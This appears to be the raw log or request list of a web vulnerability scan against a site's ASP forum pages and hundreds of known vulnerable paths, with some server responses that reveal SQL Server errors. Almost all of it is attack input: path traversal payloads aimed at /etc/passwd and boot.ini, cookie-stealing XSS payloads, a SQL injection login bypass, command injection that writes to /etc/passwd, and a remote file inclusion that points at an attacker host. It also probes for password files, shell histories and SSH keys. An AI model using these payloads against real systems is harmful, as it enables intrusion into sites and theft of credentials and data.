+forum1.asp?n=/....../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. 
+forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu +forum1.asp?n=/../../../../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=/etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1.asp?n=1753&nn=%60/etc/passwd%60 +forum1.asp?n=1753&nn=....//....//....//....//....//....//....//etc.passwd +forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd +forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd%00 +forum1.asp?n=1753&nn=/....../boot.ini +forum1.asp?n=1753&nn=/..../boot.ini +forum1.asp?n=1753&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini +forum1.asp?n=1753&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini +forum1.asp?n=1753&nn=/etc/passwd +forum1.asp?n=1753&nn=/etc/passwd%00 +forum1.asp?n=1753&nn=c:\boot.ini +forum1.asp?n=c:\boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1_professionnel.asp?n=%60/etc/passwd%60&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. 
+forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi +forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren +forum1_professionnel.asp?n=/....../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor +forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste +forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec +forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco +forum1_professionnel.asp?n=/etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1_professionnel.asp?n=/etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. 
+forum1_professionnel.asp?n=1771&nn=%60/etc/passwd%60&page=1 +forum1_professionnel.asp?n=1771&nn=....//....//....//....//....//....//....//etc.passwd&page=1 +forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd%00&page=1 +forum1_professionnel.asp?n=1771&nn=/....../boot.ini&page=1 +forum1_professionnel.asp?n=1771&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&page=1 +forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1 +forum1_professionnel.asp?n=1771&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&page=1 +forum1_professionnel.asp?n=1771&nn=/etc/passwd%00&page=1 +forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1 +forum1_professionnel.asp?n=1771&nn=100&page=%60/etc/passwd%60 +forum1_professionnel.asp?n=1771&nn=100&page=....//....//....//....//....//....//....//etc.passwd +forum1_professionnel.asp?n=1771&nn=100&page=../../../../../../../../../etc/passwd%00 +forum1_professionnel.asp?n=1771&nn=100&page=/....../boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/..../boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/.../.../.../.../.../.../boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../../../../../../../../../../../boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd +forum1_professionnel.asp?n=1771&nn=100&page=/.\"./.\"./.\"./.\"./.\"./boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd +forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd%00 +forum1_professionnel.asp?n=1771&nn=100&page=c:\boot.ini +forum1_professionnel.asp?n=1771&nn=c:\boot.ini&page=1 +forum1_professionnel.asp?n=c:\boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. 
+forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=268 +forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. +forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. +forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. 
+forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=100 +forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. +functions.inc.php+ +get_od_toc.pl +globals.php3 +globals.pl +Gozila.cgi +helperfunction.php +homebet/homebet.dll?form=menu&option=menu-signin +htmltonuke.php +idealbb/error.asp?|-|0|404_Object_Not_Found +iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found +imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. +imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. 
+imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. +include/customize.php +include/help.php +includes/footer.php3 +includes/header.php3 +index.php?base=test%20 +index.php?IDAdmin=test +index.php?pymembs=admin +index.php?SqlQuery=test%20 +index.php?tampon=test%20 +index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20 +infos/contact/index.asp +infos/faq/index.asp +infos/gen/index.asp +infos/services/index.asp +instaboard/index.cfm +intranet/browse.php +invitefriends.php3 +ipchat.php +ixmail_netattach.php +jsptest.jsp+ +kernel/class/delete.php +kernel/classes/ezrole.php +ldap.search.php3?ldap_serv=nonsense%20 +livredor/index.php +login.php3?reason=chpass2%20 +mail/include.html +mail/settings.html +mail/src/read_body.php +mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd +mambo/banners.php +manage/login.asp+ +mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F +members/ID.pm +members/ID.xbb +mod.php +modif/delete.php +modif/ident.php 
+modif_infos.asp?n=%60/etc/passwd%60 +modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd +modif_infos.asp?n=../../../../../../../../../etc/passwd%00 +modif_infos.asp?n=/....../boot.ini +modif_infos.asp?n=/.../.../.../.../.../.../boot.ini +modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini +modif_infos.asp?n=/../../../../../../../../../etc/passwd +modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini +modif_infos.asp?n=/etc/passwd +modif_infos.asp?n=/etc/passwd%00 +modif_infos.asp?n=c:\boot.ini +modules/Downloads/voteinclude.php+ +modules/Forums/attachment.php +modules/Search/index.php +modules/WebChat/in.php+ +modules/WebChat/out.php +modules/WebChat/quit.php +modules/WebChat/users.php +modules/Your_Account/navbar.php+ +moregroupware/modules/webmail2/inc/ +msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found +myguestBk/add1.asp?|-|0|404_Object_Not_Found +myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found +myguestBk/admin/index.asp?|-|0|404_Object_Not_Found +netget?sid=Safety&msg=2002&file=Safety +newtopic.php +nphp/nphpd.php +OpenTopic +options.inc.php+ +oscommerce/default.php +parse_xml.cgi +php/gaestebuch/admin/index.php +php/php4ts.dll +pks/lookup +pm/lib.inc.php +poppassd.php3+ +produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found +productcart/database/EIPC.mdb +productcart/pc/Custva.asp?|-|0|404_Object_Not_Found +ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found +product_info.php +prometheus-all/index.php +proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\" +protected/ +protected/secret.html+ +protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=' +protection.php +pt_config.inc +pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20 +pvote/del.php?pollorder=1%20 +quikmail/nph-emumail.cgi?type=../%00 +room/save_item.php 
+rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. +rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. 
+screen.php +scripts/tradecli.dll +scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir +security/web_access.html +sendphoto.php +servers/link.cgi +setpasswd.cgi +shop/php_files/site.config.php+ +shop/search.php +shop/show.php +shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20 +Site/biztalkhttpreceive.dll +site_searcher.cgi +spelling.php3+ +squirrelmail/src/read_body.php +staticpages/index.php +status.php3 +supporter/index.php +supporter/tupdate.php +sw000.asp?|-|0|404_Object_Not_Found +syslog.htm?%20 +technote/print.cgi +texis/websearch/phine +tinymsg.php +tmp_view.php?file=/etc/passwd +topic/entete.php +topsitesdir/edit.php +ttforum/index.php +tutos/file/file_new.php +tutos/file/file_select.php +typo3/typo3/dev/translations.php +uifc/MultFileUploadHandler.php+ +url.jsp +useraction.php3 +userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd +utils/sprc.asp+ +vars.inc+ +VBZooM/add-subject.php +wbboard/profile.php +wbboard/reply.php +webcalendar/login.php +webcalendar/view_m.php +webmail/lib/emailreader_execute_on_each_page.inc.php +webmail/src/read_body.php +web_app/WEB-INF/webapp.properties +XMBforum/buddy.php +XMBforum/member.php +x_stat_admin.php +yabbse/Reminder.php +yabbse/Sources/Packages.php +zentrack/index.php +_head.php +cgi-bin/adduser.cgi +cgi-bin/amadmin.pl +cgi-bin/anyboard.cgi +cgi-bin/AT-generate.cgi +cgi-bin/auctiondeluxe/auction.pl +cgi-bin/awl/auctionweaver.pl +cgi-bin/bb-ack.sh +cgi-bin/bb-histlog.sh +cgi-bin/bb-rep.sh +cgi-bin/bb-replog.sh +cgi-bin/bbs_forum.cgi +cgi-bin/build.cgi +cgi-bin/bulk/bulk.cgi +cgi-bin/cached_feed.cgi +cgi-bin/calender_admin.pl +cgi-bin/cartmanager.cgi +cgi-bin/cbmc/forums.cgi +cgi-bin/cgforum.cgi +cgi-bin/change-your-password.pl +cgi-bin/clickresponder.pl +cgi-bin/commandit.cgi +cgi-bin/counter-ord +cgi-bin/counterbanner +cgi-bin/counterbanner-ord +cgi-bin/counterfiglet-ord +cgi-bin/counterfiglet/nc/ +cgi-bin/CSMailto.cgi 
+cgi-bin/CSMailto/CSMailto.cgi +cgi-bin/csNews.cgi +cgi-bin/csPassword.cgi +cgi-bin/csPassword/csPassword.cgi +cgi-bin/cutecast/members/ +cgi-bin/day5datanotifier.cgi +cgi-bin/db2www/library/document.d2w/show +cgi-bin/db_manager.cgi +cgi-bin/DCFORMS98.CGI +cgi-bin/dnewsweb +cgi-bin/donothing +cgi-bin/ezshopper2/loadpage.cgi +cgi-bin/ezshopper3/loadpage.cgi +cgi-bin/if/admin/nph-build.cgi +cgi-bin/ikonboard/help.cgi? +cgi-bin/imageFolio.cgi +cgi-bin/imagefolio/admin/admin.cgi +cgi-bin/journal.cgi?folder=journal.cgi%00 +cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd +cgi-bin/majordomo.pl +cgi-bin/mojo/mojo.cgi +cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a +cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK +cgi-bin/non-existent.pl +cgi-bin/nph-exploitscanget.cgi +cgi-bin/nph-maillist.pl +cgi-bin/parse-file +cgi-bin/php-cgi +cgi-bin/pollssi.cgi +cgi-bin/postcards.cgi +cgi-bin/profile.cgi +cgi-bin/quikstore.cfg +cgi-bin/register.cgi +cgi-bin/replicator/webpage.cgi/ +cgi-bin/rightfax/fuwww.dll/? 
+cgi-bin/rmp_query +cgi-bin/robpoll.cgi +cgi-bin/scripts/*%0a.pl +cgi-bin/simplestguest.cgi +cgi-bin/simplestmail.cgi +cgi-bin/statusconfig.pl +cgi-bin/sws/manager.pl +cgi-bin/texis/phine +cgi-bin/Upload.pl +cgi-bin/utm/admin +cgi-bin/utm/utm_stat +ows-bin/oaskill.exe?abcde.exe +ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah +cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 +cgi-bin//_vti_pvt/doctodep.btr +cgi-bin/cfgwiz.exe +cgi-bin/Cgitest.exe +cgi-bin/mailform.exe +cgi-bin/ms_proxy_auth_query/ +cgi-bin/post16.exe +oem_webstage/oem.conf +database/ +demo/sql/index.jsp +cgi-bin/.htaccess +cgi-bin/.htaccess.old +cgi-bin/.htaccess.save +cgi-bin/.htaccess~ +cgi-bin/.htpasswd +cgi-bin/.passwd +.wwwacl +.www_acl +cgi-bin/.wwwacl +cgi-bin/.www_acl +.htpasswd +.access +.addressbook +.bashrc +.bash_history +.forward +.history +.htaccess +.lynx_cookies +.mysql_history +.passwd +.pinerc +.plan +.proclog +.procmailrc +.profile +.rhosts +.sh_history +.ssh +.ssh/authorized_keys +.ssh/known_hosts +cgi-bin/ls +///../../data/config/microsrv.cfg +///////../../../../../../etc/passwd +_vti_bin/shtml.exe/_vti_rpc +doc/rt/overview-summary.html +docs/sdb/en/html/index.html +jservdocs/ +test/jsp/buffer1.jsp +test/jsp/buffer2.jsp +test/jsp/buffer3.jsp +test/jsp/buffer4.jsp +test/jsp/declaration/IntegerOverflow.jsp +test/jsp/extends1.jsp +test/jsp/extends2.jsp +test/jsp/Language.jsp +test/jsp/pageAutoFlush.jsp +test/jsp/pageDouble.jsp +test/jsp/pageExtends.jsp +test/jsp/pageImport2.jsp +test/jsp/pageInfo.jsp +test/jsp/pageInvalid.jsp +test/jsp/pageIsErrorPage.jsp +test/jsp/pageIsThreadSafe.jsp +test/jsp/pageSession.jsp +test/realPath.jsp +tomcat-docs/index.html +cgi-bin/test-cgi.bat +akopia/ +bc4j.html +dms0 +jspdocs/ +mod_ose_docs +ojspdemos/basic/hellouser/hellouser.jsp +ojspdemos/basic/simple/usebean.jsp +ojspdemos/basic/simple/welcomeuser.jsp +oprocmgr-status +php/index.php +pls/portal30/admin_/ +pls/simpledad/admin_/ +pls/simpledad/admin_/gateway.htm?schema=sample 
+pls/simpledad/admin_/globalsettings.htm
+search/
+servlet/Counter
+servlet/DateServlet
+servlet/FingerServlet
+servlet/HelloWorldServlet
+servlet/IsItWorking
+servlet/SessionServlet
+servlet/SimpleServlet
+servlet/SnoopServlet
+xdk/
+xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
+admcgi/contents.htm
+admcgi/scripts/Fpadmcgi.exe
+admisapi/fpadmin.htm
+bin/admin.pl
+bin/cfgwiz.exe
+bin/CGImail.exe
+bin/contents.htm
+bin/fpadmin.htm
+bin/fpremadm.exe
+bin/fpsrvadm.exe
+cgi-bin/admin.pl
+cgi-bin/cfgwiz.exe
+cgi-bin/CGImail.exe
+cgi-bin/contents.htm
+cgi-bin/fpadmin.htm
+cgi-bin/fpremadm.exe
+cgi-bin/fpsrvadm.exe
+scripts/admin.pl
+scripts/cfgwiz.exe
+scripts/CGImail.exe
+scripts/contents.htm
+scripts/fpadmin.htm
+scripts/fpcount.exe
+scripts/fpremadm.exe
+scripts/fpsrvadm.exe
+_private/
+_private/orders.htm
+_private/orders.txt
+_private/register.htm
+_private/register.txt
+_private/registrations.htm
+_private/registrations.txt
+_private/_vti_cnf/
+_vti_bin/
+_vti_bin/admin.pl
+_vti_bin/cfgwiz.exe
+_vti_bin/CGImail.exe
+_vti_bin/contents.htm
+_vti_bin/fpadmin.htm
+_vti_bin/fpremadm.exe
+_vti_bin/fpsrvadm.exe
+_vti_bin/_vti_cnf/
+_vti_cnf/_vti_cnf/
+_vti_inf.html
+_vti_log/_vti_cnf/
+_vti_pvt/administrators.pwd
+_vti_pvt/authors.pwd
+_vti_pvt/service.pwd
+_vti_pvt/users.pwd
+manual/servlets/scripts/servlet1/servform.htm
+manual/servlets/scripts/shoes/shoeform.htm
+examples/
+examples/context
+examples/forward1
+examples/forward2
+examples/header
+examples/include1
+examples/info
+examples/jsp/index.html
+help/contents.htm
+help/home.html
+manual/ag/esperfrm.htm
+nethome/
+com/novell/gwmonitor/help/en/default.htm
+com/novell/webaccess/help/en/default.htm
+com/novell/webpublisher/help/en/default.htm
+servlet/AdminServlet
+servlet/gwmonitor
+servlet/PrintServlet
+servlet/SearchServlet
+servlet/ServletManager
+servlet/sq1cdsn
+servlet/sqlcdsn
+servlet/webacc
+servlet/webpub
+WebSphereSamples
+cgi-bin/cgi-test.exe
+doc/domguide.nsf
+doc/dspug.nsf
+doc/help4.nsf
+doc/helpadmin.nsf
+doc/helplt4.nsf
+doc/internet.nsf
+doc/javapg.nsf
+doc/lccon.nsf
+doc/migrate.nsf
+doc/npn_admn.nsf
+doc/npn_rn.nsf
+doc/readmec.nsf
+doc/readmes.nsf
+doc/smhelp.nsf
+doc/srvinst.nsf
+domguide.nsf
+dspug.nsf
+help/domguide.nsf
+help/dspug.nsf
+help/help4.nsf
+help/helpadmin.nsf
+help/helplt4.nsf
+help/internet.nsf
+help/javapg.nsf
+help/lccon.nsf
+help/migrate.nsf
+help/npn_admn.nsf
+help/npn_rn.nsf
+help/readmec.nsf
+help/readmes.nsf
+help/smhelp.nsf
+help/srvinst.nsf
+help4.nsf
+helpadmin.nsf
+helplt4.nsf
+internet.nsf
+javapg.nsf
+lccon.nsf
+migrate.nsf
+npn_admn.nsf
+npn_rn.nsf
+readmec.nsf
+readmes.nsf
+smhelp.nsf
+srvinst.nsf
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
+lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
+netbasic/websinfo.bas
+perl/env.pl
+perl/samples/env.pl
+perl/samples/lancgi.pl
+perl/samples/ndslogin.pl
+perl/samples/volscgi.pl
+se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
+index.html.ca
+index.html.cz.iso8859-2
+index.html.de
+index.html.dk
+index.html.ee
+index.html.el
+index.html.en
+index.html.es
+index.html.et
+index.html.fr
+index.html.he.iso8859-8
+index.html.hr.iso8859-2
+index.html.it
+index.html.ja.iso2022-jp
+index.html.kr.iso2022-kr
+index.html.ltz.utf8
+index.html.lu.utf8
+index.html.nl
+index.html.nn
+index.html.no
+index.html.po.iso8859-2
+index.html.pt
+index.html.pt-br
+index.html.ru.cp-1251
+index.html.ru.cp866
+index.html.ru.iso-ru
+index.html.ru.koi8-r
+index.html.ru.utf8
+index.html.se
+index.html.tw
+index.html.tw.Big5
+index.html.var
+test
+iissamples/issamples/codebrws.asp
+iissamples/issamples/ixqlang.htm
+iissamples/issamples/Winmsdp.exe
+iissamples/sdk/asp/docs/codebrw2.asp
+iissamples/sdk/asp/docs/codebrws.asp
+iissamples/sdk/asp/docs/Winmsdp.exe
+mc-icons/
+ns-icons/
+cgi-bin/printenv
+cgi-bin/printenv
+cgi-bin/test-cgi
+cgi-bin/test-cgi
+pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
+test.php
+test/info.php
+info.php
+test/phpinfo.php +NetDetector/middle_help_intro.htm +a/ +basilix/ +bottom.html +interchange/ +sca/menu.jsp + +icons/ +manual/images/ +com +COM +doc/packages/ +image/ +javax +perl/ +scripts +SUNWmc/htdocs/en_US/ +search/inc/ +images/ +docs/ +examples/ +style/ +styles/ +forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script> +search.asp?Search=\"><script>alert(Vulnerable)</script> +uploader.php +iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp +iissamples/sdk/asp/docs/Winmsdp.exe +iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp +iissamples/exair/howitworks/Winmsdp.exe +%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini +%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini +conspass.chl+ +consport.chl+ +general.chl+ +srvstatus.chl+ +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz +firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script> +antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0 +antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally) +theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session +theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session 